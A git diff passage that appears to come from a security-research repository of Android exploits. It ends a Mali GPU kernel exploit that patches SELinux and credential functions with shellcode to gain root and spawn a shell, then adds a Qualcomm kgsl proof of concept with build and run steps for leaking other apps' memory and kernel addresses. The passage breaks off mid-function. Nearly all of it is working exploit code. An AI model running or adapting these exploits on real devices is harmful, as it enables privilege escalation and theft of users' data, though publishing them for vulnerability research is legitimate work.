uint64_t pgd) { + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), 2, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); +} + +void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) { + uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + usleep(100000); + //Go through the reserve pages addresses to write to avc_denied with our own shellcode + write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t)); + + //Triggers avc_denied to disable SELinux + open("/dev/kmsg", O_RDONLY); + + uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; + write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + + //Call commit_creds to overwrite process credentials to gain root + write_func(mali_fd2, sel_read_enforce, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); +} + +void* shrink_jit_mem(void* args) { + uint64_t* arguments = (uint64_t*)args; + int mali_fd = arguments[0]; + uint64_t gpu_addr = arguments[1]; + uint64_t pages = arguments[2]; + while (!g_ready_commit) {}; + usleep(10000); + mem_commit(mali_fd, gpu_addr, pages); + return NULL; +} + +void reclaim_freed_pages(int mali_fd) { + for (int i = 0; i < RECLAIM_SIZE; i++) { + reclaim_va[i] = (uint64_t)map_gpu(mali_fd, 1, 1, false, JIT_GROUP_ID); + uint64_t* this_va = (uint64_t*)(reclaim_va[i]); + *this_va = 0; + } +} + +uint64_t find_freed_region(int* idx) { + *idx = -1; + for (int i = 0; i < RECLAIM_SIZE; i++) { + uint64_t* this_region = (uint64_t*)(reclaim_va[i]); + uint64_t val = *this_region; + if (val >= 0x41 && val < 0x41 + FREED_NUM) { + *idx = i; + return val - 0x41; + } + } + return -1; +} + +int trigger(int mali_fd2) { + + int mali_fd = open_dev(MALI); + + setup_mali(mali_fd, 0); + + void* tracking_page = setup_tracking_page(mali_fd); + jit_init(mali_fd, JIT_PAGES, 100, JIT_GROUP_ID); + + g_ready_commit = false; + commit_failed = false; + atom_number = 1; + void* gpu_alloc_addr = map_gpu(mali_fd, 1, 1, false, 0); + uint64_t first_jit_id = 1; + uint64_t second_jit_id = 2; + + uint64_t jit_addr = jit_allocate(mali_fd, increase_atom_number(), first_jit_id, FREED_NUM, 0, 0, 0, (uint64_t)gpu_alloc_addr); + uint64_t jit_addr2 = jit_allocate(mali_fd, increase_atom_number(), second_jit_id, POOL_SIZE * 2, 512 - FREED_NUM, 1, 1, (uint64_t)gpu_alloc_addr); + + if (jit_addr % (512 * 0x1000) != 0 || jit_addr2 < jit_addr || jit_addr2 - jit_addr != FREED_NUM * 0x1000) { + LOG("incorrect memory layout\n"); + LOG("jit_addr %lx %lx\n", jit_addr, jit_addr2); + err(1, "incorrect memory layout\n"); + } + + jit_free(mali_fd, increase_atom_number(), second_jit_id); + pthread_t thread; + uint64_t args[3]; + args[0] = mali_fd; + args[1] = jit_addr2; + args[2] = 0; + + pthread_create(&thread, NULL, &shrink_jit_mem, (void*)&(args[0])); + g_ready_commit = true; + jit_allocate(mali_fd, increase_atom_number(), second_jit_id, POOL_SIZE * 2, GROW_SIZE, 1, 1, (uint64_t)gpu_alloc_addr); + + pthread_join(thread, NULL); + if (commit_failed) { + close(mali_fd); + return -1; + } + jit_free(mali_fd, increase_atom_number(), second_jit_id); + for (int i = 0; i < FLUSH_REGION_SIZE; i++) { + union kbase_ioctl_mem_query query = {0}; + query.in.gpu_addr = jit_addr2; + query.in.query = KBASE_MEM_QUERY_COMMIT_SIZE; + flush_regions[i] = flush(i); + if (ioctl(mali_fd, KBASE_IOCTL_MEM_QUERY, &query) < 0) { + LOG("region freed\n"); + reclaim_freed_pages(mali_fd); + uint64_t start_addr = jit_addr2 + 0x1000 * (512 - FREED_NUM); + for (int j = 0; j < FREED_NUM; j++) { + write_to(mali_fd, start_addr + j * 0x1000, 0x41 + j, increase_atom_number(), MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); + } + int idx = -1; + uint64_t offset = find_freed_region(&idx); + if (offset == -1) { + LOG("unable to find region\n"); + for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE); + close(mali_fd); + return -1; + } + LOG("found region %d at %lx\n", idx, start_addr + offset * 0x1000); + uint64_t drain = drain_mem_pool(mali_fd); + release_mem_pool(mali_fd, drain); + munmap((void*)(reclaim_va[idx]), 0x1000); + mmap(NULL, 0x1000 * 0x1000, PROT_READ|PROT_WRITE, + MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + map_reserved(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + for (int r = 0; r < FLUSH_REGION_SIZE; r++) munmap(flush_regions[r], FLUSH_SIZE); + + uint64_t pgd = start_addr + offset * 0x1000; + write_shellcode(mali_fd, mali_fd2, pgd, &(reserved[0])); + run_enforce(); + cleanup(mali_fd, pgd); + return 0; + } + } + close(mali_fd); + return -1; +} + +#ifdef SHELL + +int main() { + setbuf(stdout, NULL); + setbuf(stderr, NULL); + + select_offset(); + + int mali_fd2 = open_dev(MALI); + setup_mali(mali_fd2, 1); + setup_tracking_page(mali_fd2); + reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + map_gpu(mali_fd2, 1, 1, false, 0); + if (!trigger(mali_fd2)) { + system("sh"); + } +} +#else +#include +JNIEXPORT int JNICALL +Java_com_example_hellojni_MaliExpService_stringFromJNI( JNIEnv* env, jobject thiz) +{ + setbuf(stdout, NULL); + setbuf(stderr, NULL); + select_offset(); + + int mali_fd2 = open_dev(MALI); + setup_mali(mali_fd2, 1); + setup_tracking_page(mali_fd2); + reserve_pages(mali_fd2, RESERVED_SIZE, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(reserved[0])); + map_gpu(mali_fd2, 1, 1, false, 0); + if (!trigger(mali_fd2)) { + LOG("uid: %d euid %d", getuid(), geteuid()); + return 0; + } + return -1; +} +#endif + diff --git a/SecurityExploits/Android/Mali/GHSL-2023-005/midgard.h b/SecurityExploits/Android/Mali/GHSL-2023-005/midgard.h new file mode 100644 index 0000000..e0ce432 --- /dev/null +++ b/SecurityExploits/Android/Mali/GHSL-2023-005/midgard.h @@ -0,0 +1,260 @@ +#ifndef MIDGARD_H +#define MIDGARD_H + +//Generated using pandecode-standalone: https://gitlab.freedesktop.org/panfrost/pandecode-standalone + +#include +#include +#include +#include +#include +#include +#include + +#define pan_section_ptr(base, A, S) \ + ((void *)((uint8_t *)(base) + MALI_ ## A ## _SECTION_ ## S ## _OFFSET)) + +#define pan_section_pack(dst, A, S, name) \ + for (MALI_ ## A ## _SECTION_ ## S ## _TYPE name = { MALI_ ## A ## _SECTION_ ## S ## _header }, \ + *_loop_terminate = (void *) (dst); \ + __builtin_expect(_loop_terminate != NULL, 1); \ + ({ MALI_ ## A ## _SECTION_ ## S ## _pack(pan_section_ptr(dst, A, S), &name); \ + _loop_terminate = NULL; })) + + +static inline uint64_t +__gen_uint(uint64_t v, uint32_t start, uint32_t end) +{ +#ifndef NDEBUG + const int width = end - start + 1; + if (width < 64) { + const uint64_t max = (1ull << width) - 1; + assert(v <= max); + } +#endif + + return v << start; +} + +static inline uint64_t +__gen_unpack_uint(const uint8_t *restrict cl, uint32_t start, uint32_t end) +{ + uint64_t val = 0; + const int width = end - start + 1; + const uint64_t mask = (width == 64 ? ~0 : (1ull << width) - 1 ); + + for (int byte = start / 8; byte <= end / 8; byte++) { + val |= ((uint64_t) cl[byte]) << ((byte - start / 8) * 8); + } + + return (val >> (start % 8)) & mask; +} + +enum mali_job_type { + MALI_JOB_TYPE_NOT_STARTED = 0, + MALI_JOB_TYPE_NULL = 1, + MALI_JOB_TYPE_WRITE_VALUE = 2, + MALI_JOB_TYPE_CACHE_FLUSH = 3, + MALI_JOB_TYPE_COMPUTE = 4, + MALI_JOB_TYPE_VERTEX = 5, + MALI_JOB_TYPE_GEOMETRY = 6, + MALI_JOB_TYPE_TILER = 7, + MALI_JOB_TYPE_FUSED = 8, + MALI_JOB_TYPE_FRAGMENT = 9, +}; + +enum mali_write_value_type { + MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER = 1, + MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP = 2, + MALI_WRITE_VALUE_TYPE_ZERO = 3, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_8 = 4, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_16 = 5, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_32 = 6, + MALI_WRITE_VALUE_TYPE_IMMEDIATE_64 = 7, +}; + + +struct MALI_WRITE_VALUE_JOB_PAYLOAD { + uint64_t address; + enum mali_write_value_type type; + uint64_t immediate_value; +}; + +struct MALI_JOB_HEADER { + uint32_t exception_status; + uint32_t first_incomplete_task; + uint64_t fault_pointer; + bool is_64b; + enum mali_job_type type; + bool barrier; + bool invalidate_cache; + bool suppress_prefetch; + bool enable_texture_mapper; + bool relax_dependency_1; + bool relax_dependency_2; + uint32_t index; + uint32_t dependency_1; + uint32_t dependency_2; + uint64_t next; +}; + + +static inline void +MALI_JOB_HEADER_pack(uint32_t * restrict cl, + const struct MALI_JOB_HEADER * restrict values) +{ + cl[ 0] = __gen_uint(values->exception_status, 0, 31); + cl[ 1] = __gen_uint(values->first_incomplete_task, 0, 31); + cl[ 2] = __gen_uint(values->fault_pointer, 0, 63); + cl[ 3] = __gen_uint(values->fault_pointer, 0, 63) >> 32; + cl[ 4] = __gen_uint(values->is_64b, 0, 0) | + __gen_uint(values->type, 1, 7) | + __gen_uint(values->barrier, 8, 8) | + __gen_uint(values->invalidate_cache, 9, 9) | + __gen_uint(values->suppress_prefetch, 11, 11) | + __gen_uint(values->enable_texture_mapper, 12, 12) | + __gen_uint(values->relax_dependency_1, 14, 14) | + __gen_uint(values->relax_dependency_2, 15, 15) | + __gen_uint(values->index, 16, 31); + cl[ 5] = __gen_uint(values->dependency_1, 0, 15) | + __gen_uint(values->dependency_2, 16, 31); + cl[ 6] = __gen_uint(values->next, 0, 63); + cl[ 7] = __gen_uint(values->next, 0, 63) >> 32; +} + + +#define MALI_JOB_HEADER_LENGTH 32 +struct mali_job_header_packed { uint32_t opaque[8]; }; +static inline void +MALI_JOB_HEADER_unpack(const uint8_t * restrict cl, + struct MALI_JOB_HEADER * restrict values) +{ + if (((const uint32_t *) cl)[4] & 0x2400) fprintf(stderr, "XXX: Invalid field unpacked at word 4\n"); + values->exception_status = __gen_unpack_uint(cl, 0, 31); + values->first_incomplete_task = __gen_unpack_uint(cl, 32, 63); + values->fault_pointer = __gen_unpack_uint(cl, 64, 127); + values->is_64b = __gen_unpack_uint(cl, 128, 128); + values->type = __gen_unpack_uint(cl, 129, 135); + values->barrier = __gen_unpack_uint(cl, 136, 136); + values->invalidate_cache = __gen_unpack_uint(cl, 137, 137); + values->suppress_prefetch = __gen_unpack_uint(cl, 139, 139); + values->enable_texture_mapper = __gen_unpack_uint(cl, 140, 140); + values->relax_dependency_1 = __gen_unpack_uint(cl, 142, 142); + values->relax_dependency_2 = __gen_unpack_uint(cl, 143, 143); + values->index = __gen_unpack_uint(cl, 144, 159); + values->dependency_1 = __gen_unpack_uint(cl, 160, 175); + values->dependency_2 = __gen_unpack_uint(cl, 176, 191); + values->next = __gen_unpack_uint(cl, 192, 255); +} + +static inline const char * +mali_job_type_as_str(enum mali_job_type imm) +{ + switch (imm) { + case MALI_JOB_TYPE_NOT_STARTED: return "Not started"; + case MALI_JOB_TYPE_NULL: return "Null"; + case MALI_JOB_TYPE_WRITE_VALUE: return "Write value"; + case MALI_JOB_TYPE_CACHE_FLUSH: return "Cache flush"; + case MALI_JOB_TYPE_COMPUTE: return "Compute"; + case MALI_JOB_TYPE_VERTEX: return "Vertex"; + case MALI_JOB_TYPE_GEOMETRY: return "Geometry"; + case MALI_JOB_TYPE_TILER: return "Tiler"; + case MALI_JOB_TYPE_FUSED: return "Fused"; + case MALI_JOB_TYPE_FRAGMENT: return "Fragment"; + default: return "XXX: INVALID"; + } +} + +static inline void +MALI_JOB_HEADER_print(FILE *fp, const struct MALI_JOB_HEADER * values, unsigned indent) +{ + fprintf(fp, "%*sException Status: %u\n", indent, "", values->exception_status); + fprintf(fp, "%*sFirst Incomplete Task: %u\n", indent, "", values->first_incomplete_task); + fprintf(fp, "%*sFault Pointer: 0x%" PRIx64 "\n", indent, "", values->fault_pointer); + fprintf(fp, "%*sIs 64b: %s\n", indent, "", values->is_64b ? "true" : "false"); + fprintf(fp, "%*sType: %s\n", indent, "", mali_job_type_as_str(values->type)); + fprintf(fp, "%*sBarrier: %s\n", indent, "", values->barrier ? "true" : "false"); + fprintf(fp, "%*sInvalidate Cache: %s\n", indent, "", values->invalidate_cache ? "true" : "false"); + fprintf(fp, "%*sSuppress Prefetch: %s\n", indent, "", values->suppress_prefetch ? "true" : "false"); + fprintf(fp, "%*sEnable Texture Mapper: %s\n", indent, "", values->enable_texture_mapper ? "true" : "false"); + fprintf(fp, "%*sRelax Dependency 1: %s\n", indent, "", values->relax_dependency_1 ? "true" : "false"); + fprintf(fp, "%*sRelax Dependency 2: %s\n", indent, "", values->relax_dependency_2 ? "true" : "false"); + fprintf(fp, "%*sIndex: %u\n", indent, "", values->index); + fprintf(fp, "%*sDependency 1: %u\n", indent, "", values->dependency_1); + fprintf(fp, "%*sDependency 2: %u\n", indent, "", values->dependency_2); + fprintf(fp, "%*sNext: 0x%" PRIx64 "\n", indent, "", values->next); +} + +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_pack(uint32_t * restrict cl, + const struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values) +{ + cl[ 0] = __gen_uint(values->address, 0, 63); + cl[ 1] = __gen_uint(values->address, 0, 63) >> 32; + cl[ 2] = __gen_uint(values->type, 0, 31); + cl[ 3] = 0; + cl[ 4] = __gen_uint(values->immediate_value, 0, 63); + cl[ 5] = __gen_uint(values->immediate_value, 0, 63) >> 32; +} + + +#define MALI_WRITE_VALUE_JOB_PAYLOAD_LENGTH 24 +#define MALI_WRITE_VALUE_JOB_PAYLOAD_header 0 + + +struct mali_write_value_job_payload_packed { uint32_t opaque[6]; }; +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_unpack(const uint8_t * restrict cl, + struct MALI_WRITE_VALUE_JOB_PAYLOAD * restrict values) +{ + if (((const uint32_t *) cl)[3] & 0xffffffff) fprintf(stderr, "XXX: Invalid field unpacked at word 3\n"); + values->address = __gen_unpack_uint(cl, 0, 63); + values->type = __gen_unpack_uint(cl, 64, 95); + values->immediate_value = __gen_unpack_uint(cl, 128, 191); +} + +static inline const char * +mali_write_value_type_as_str(enum mali_write_value_type imm) +{ + switch (imm) { + case MALI_WRITE_VALUE_TYPE_CYCLE_COUNTER: return "Cycle Counter"; + case MALI_WRITE_VALUE_TYPE_SYSTEM_TIMESTAMP: return "System Timestamp"; + case MALI_WRITE_VALUE_TYPE_ZERO: return "Zero"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_8: return "Immediate 8"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_16: return "Immediate 16"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_32: return "Immediate 32"; + case MALI_WRITE_VALUE_TYPE_IMMEDIATE_64: return "Immediate 64"; + default: return "XXX: INVALID"; + } +} + +static inline void +MALI_WRITE_VALUE_JOB_PAYLOAD_print(FILE *fp, const struct MALI_WRITE_VALUE_JOB_PAYLOAD * values, unsigned indent) +{ + fprintf(fp, "%*sAddress: 0x%" PRIx64 "\n", indent, "", values->address); + fprintf(fp, "%*sType: %s\n", indent, "", mali_write_value_type_as_str(values->type)); + fprintf(fp, "%*sImmediate Value: 0x%" PRIx64 "\n", indent, "", values->immediate_value); +} + +struct mali_write_value_job_packed { + uint32_t opaque[14]; +}; + +#define MALI_JOB_HEADER_header \ + .is_64b = true + +#define MALI_WRITE_VALUE_JOB_LENGTH 56 +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_TYPE struct MALI_JOB_HEADER +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_header MALI_JOB_HEADER_header +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_pack MALI_JOB_HEADER_pack +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_unpack MALI_JOB_HEADER_unpack +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_print MALI_JOB_HEADER_print +#define MALI_WRITE_VALUE_JOB_SECTION_HEADER_OFFSET 0 +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_TYPE struct MALI_WRITE_VALUE_JOB_PAYLOAD +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_header MALI_WRITE_VALUE_JOB_PAYLOAD_header +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_pack MALI_WRITE_VALUE_JOB_PAYLOAD_pack +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_unpack MALI_WRITE_VALUE_JOB_PAYLOAD_unpack +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_print MALI_WRITE_VALUE_JOB_PAYLOAD_print +#define MALI_WRITE_VALUE_JOB_SECTION_PAYLOAD_OFFSET 32 + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md new file mode 100644 index 0000000..cfb7192 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/README.md @@ -0,0 +1,48 @@ +## CVE-2022-25664 + +The write up can be found [here](https://github.blog/2023-02-23-the-code-that-wasnt-there-reading-memory-on-an-android-device-by-accident). This is a bug in the Qualcomm kgsl driver that I reported in December 2021. The bug can be used to leak information in other user apps, as well as in the kernel from an untrusted app. + +The directory `adreno_user` contains a proof-of-concept for leaking memory from other applications. It'll repeatedly trigger the bug and read the stale information contained in memory pages. There is no telling or control over what information is being leaked. To test this, compile with the following command: + +``` +aarch64-linux-android30-clang -O2 adreno_user.c -o adreno_user +``` + +and then push `adreno_user` to the device and run it. It should print out non zero memory content: + +``` +flame:/ $ /data/local/tmp/adreno_user +hexdump(0x50000000, 0x190) +00000000 0d 00 00 00 00 00 00 00 22 55 00 00 00 00 00 00 |........"U......| +00000010 fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4 |..g.s.....g.s...| +00000020 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 |................| +00000030 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| +00000040 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................| +00000050 cb e9 67 e5 73 00 00 b4 00 00 00 00 00 00 00 00 |..g.s...........| +00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| +00000070 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| +00000080 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| +00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| +000000a0 fb 84 67 b5 73 00 00 b4 e0 84 67 b5 73 00 00 b4 |..g.s.....g.s...| +....... +``` + +The directory `adreno_kernel` contains a proof-of-concept for leaking kernel information for KASLR bypass. It'll repeatedly trigger the bug and tries to leak kernel addresses. Depending on whether the device is running kernel branch 4.x or 5.x, the Macro `KERNEL_BRANCH` in `adreno_kernel.c` should be set to either `4` or `5`. + +To test, compile with + +``` +aarch64-linux-android30-clang adreno_kernel.c adreno_cmd.c kgsl_utils.c -O3 -o adreno_kernel +``` + +and then run it on the device. If successful, it should print out the kernel addresses of some objects and functions: + +``` +flame:/ $ /data/local/tmp/adreno_kernel +found dma fence object: +kgsl_syncsource_fence_ops address: ffffff9daaea8b48 +object address: fffffffe116100a0 +syncsource address: fffffffe0b244480 +``` + +It has been tested on a number of devices. The time it takes (depends on the success rate of a single leak) varies across devices. It is relatively quick Pixel 4, but takes longer on the Samsung Z flip 3. diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c new file mode 100644 index 0000000..9a9b279 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.c @@ -0,0 +1,76 @@ +#include "adreno_cmd.h" + +uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr) +{ + uint *start = cmds; + + *cmds++ = lower_32_bits(gpuaddr); + *cmds++ = upper_32_bits(gpuaddr); + + return cmds - start; +} + +uint pm4_calc_odd_parity_bit(uint val) { + return (0x9669 >> (0xf & ((val) ^ + ((val) >> 4) ^ ((val) >> 8) ^ ((val) >> 12) ^ + ((val) >> 16) ^ ((val) >> 20) ^ ((val) >> 24) ^ + ((val) >> 28)))) & 1; +} + +uint cp_type7_packet(uint opcode, uint cnt) { + return CP_TYPE7_PKT | ((cnt) << 0) | + (pm4_calc_odd_parity_bit(cnt) << 15) | + (((opcode) & 0x7F) << 16) | + ((pm4_calc_odd_parity_bit(opcode) << 23)); +} + +uint cp_wait_for_me( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_WAIT_FOR_ME, 0); + + return cmds - start; +} + +uint cp_mem_packet(int opcode, uint size, uint num_mem) { + return cp_type7_packet(opcode, size + num_mem); +} + +uint cp_wait_for_idle( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_WAIT_FOR_IDLE, 0); + + return cmds - start; +} + +uint cp_type4_packet(uint opcode, uint cnt) +{ + return CP_TYPE4_PKT | ((cnt) << 0) | + (pm4_calc_odd_parity_bit(cnt) << 7) | + (((opcode) & 0x3FFFF) << 8) | + ((pm4_calc_odd_parity_bit(opcode) << 27)); +} + +uint cp_register( + unsigned int reg, unsigned int size) +{ + return cp_type4_packet(reg, size); +} + +uint cp_invalidate_state( + uint *cmds) +{ + uint *start = cmds; + + *cmds++ = cp_type7_packet(CP_SET_DRAW_STATE, 3); + *cmds++ = 0x40000; + *cmds++ = 0; + *cmds++ = 0; + + return cmds - start; +} diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h new file mode 100644 index 0000000..01cfeb5 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_cmd.h @@ -0,0 +1,40 @@ +#ifndef ADRENO_CMD_H +#define ADRENO_CMD_H + +#include + +#define CP_TYPE4_PKT (4 << 28) +#define CP_TYPE7_PKT (7 << 28) + +#define CP_NOP 0x10 +#define CP_WAIT_FOR_ME 0x13 +#define CP_WAIT_FOR_IDLE 0x26 +#define CP_WAIT_REG_MEM 0x3c +#define CP_MEM_WRITE 0x3d +#define CP_INDIRECT_BUFFER_PFE 0x3f +#define CP_SET_DRAW_STATE 0x43 +#define CP_MEM_TO_MEM 0x73 +#define CP_SET_PROTECTED_MODE 0x5f + +#define upper_32_bits(n) ((uint32_t)(((n) >> 16) >> 16)) +#define lower_32_bits(n) ((uint32_t)(n)) + +uint cp_gpuaddr(uint *cmds, uint64_t gpuaddr); + +uint pm4_calc_odd_parity_bit(uint val); + +uint cp_type7_packet(uint opcode, uint cnt); + +uint cp_wait_for_me(uint *cmds); + +uint cp_mem_packet(int opcode, uint size, uint num_mem); + +uint cp_wait_for_idle(uint *cmds); + +uint cp_type4_packet(uint opcode, uint cnt); + +uint cp_register(unsigned int reg, unsigned int size); + +uint cp_invalidate_state(uint *cmds); + +#endif diff --git a/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c new file mode 100644 index 0000000..474f706 --- /dev/null +++ b/SecurityExploits/Android/Qualcomm/CVE_2022_25664/adreno_kernel/adreno_kernel.c @@ -0,0 +1,225 @@ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +#include "kgsl_utils.h" +#include "adreno_cmd.h" +#include "dma_search.h" + +#define CMD_SIZE 4 + +#define OBJS_PER_SLAB (0x1000/OBJECT_SIZE) + +#define CPU_PARTIAL 30 + +#define MMAP_SPRAY 1000 + +#define OBJ_SPRAY 10000 + +#define CPU_SETSIZE 1024 +#define __NCPUBITS (8 * sizeof (unsigned long)) +typedef struct +{ + unsigned long __bits[CPU_SETSIZE / __NCPUBITS]; +} cpu_set_t; + +#define CPU_SET(cpu, cpusetp) \ + ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS))) +#define CPU_ZERO(cpusetp) \ + memset((cpusetp), 0, sizeof(cpu_set_t)) + +#define KERNEL_BRANCH KERNEL_4 + +void migrate_to_cpu(int i) +{ + int syscallres; + pid_t pid = gettid(); + cpu_set_t cpu; + CPU_ZERO(&cpu); + CPU_SET(i, &cpu); + + syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu); + if (syscallres) + { + err(1, "Error in the syscall setaffinity"); + } +} + +static uint32_t* map_anon(int kgsl_fd, uint64_t* addr, size_t size) { + uint32_t* out = NULL; + out = (uint32_t*)mmap(NULL, size, PROT_READ|PROT_WRITE, + MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + if (out == MAP_FAILED) { + err(1, "shared_mem_buf failed"); + } + int ret = kgsl_map(kgsl_fd, (unsigned long)out, size, addr, 0); + + if (ret == -1) { + err(1, "kgsl_map failed %p\n", out); + } + return out; +} + +static uint32_t write_gpu_cmd(uint32_t* write_cmd_buf, uint64_t shared_mem_gpuaddr, uint32_t n) { + uint32_t* write_cmds; + + write_cmd_buf = write_cmd_buf + 0x1000/CMD_SIZE - 5; + + write_cmds = write_cmd_buf; + + *write_cmds++ = cp_type7_packet(CP_NOP, 1); + *write_cmds++ = 0xffffffff; + + *write_cmds++ = cp_type7_packet(CP_MEM_WRITE, 2 + n); + + write_cmds += cp_gpuaddr(write_cmds, shared_mem_gpuaddr); + + return (write_cmds - write_cmd_buf + n) * CMD_SIZE; +} + + +static int io_setup(unsigned nr, aio_context_t *ctxp) +{ + return syscall(__NR_io_setup, nr, ctxp); +} + +static int io_destroy(aio_context_t ctx) +{ + return syscall(__NR_io_destroy, ctx); +} + +int find_address() { + uint32_t *write_cmd_buf; + uint64_t *shared_mem_buf; + void *shared_mem_buf2; + uint64_t shared_mem_gpuaddr2; + uint32_t n = 2048; + uint64_t shared_mem_size = 0x2000; + uint32_t cmd_size; + uint64_t write_cmd_gpuaddr = 0; + uint64_t shared_mem_gpuaddr = 0; + uint64_t hole_size = 0x1000; + int fds[OBJS_PER_SLAB * CPU_PARTIAL]; + int spray_fds[OBJ_SPRAY]; + + int fd = open("/dev/kgsl-3d0", O_RDWR); + + if (fd == -1) { + err(1, "cannot open kgsl"); + } + + uint32_t ctx_id; + if (kgsl_ctx_create(fd, &ctx_id)) { + err(1, "kgsl_ctx_create failed."); + } + + struct kgsl_syncsource_create syncsource = {0}; + if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE, &syncsource) < 0) { + err(1, "unable to create syncsource\n"); + } + + for (int i = 0; i < OBJ_SPRAY; i++) { + struct kgsl_syncsource_create_fence create_fence = {.id = syncsource.id}; + if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE, &create_fence) < 0) { + err(1, "Failed to create fence"); + } + spray_fds[i] = create_fence.fence_fd; + } + + for (int i = 0; i < CPU_PARTIAL * OBJS_PER_SLAB; i++) { + struct kgsl_syncsource_create_fence create_fence = {.id = syncsource.id}; + if (ioctl(fd, IOCTL_KGSL_SYNCSOURCE_CREATE_FENCE, &create_fence) < 0) { + err(1, "Failed to create fence"); + } + fds[i] = create_fence.fence_fd; + } + + shared_mem_buf = (uint64_t*)map_anon(fd, &shared_mem_gpuaddr, shared_mem_size); + write_cmd_buf = map_anon(fd, &write_cmd_gpuaddr, 0x1000); + uint64_t write_cmd_gpuaddr_start = write_cmd_gpuaddr; + + write_cmd_gpuaddr = write_cmd_gpuaddr + 0x1000 - 5 * CMD_SIZE; + + uint32_t* write_cmd_buf_start = write_cmd_buf; + cmd_size = write_gpu_cmd(write_cmd_buf, shared_mem_gpuaddr, n); + + usleep(50000); + void* hole = mmap(NULL, hole_size, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + shared_mem_buf2 = mmap(NULL, 0x1000, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); + + if (shared_mem_buf2 == MAP_FAILED) { + err(1, "shared_mem_buf2 failed"); + } + + munmap(hole, hole_size); + aio_context_t ctx = 0; + uint32_t nr_events = 32; + + migrate_to_cpu(0); + for (int i = 0; i < OBJS_PER_SLAB; i++) { + close(fds[i + (CPU_PARTIAL - 1) * OBJS_PER_SLAB]); + } + + for (int i = 0; i < (CPU_PARTIAL - 1); i++) { + close(fds[i * OBJS_PER_SLAB]); + } + + if (io_setup(nr_events, &ctx) 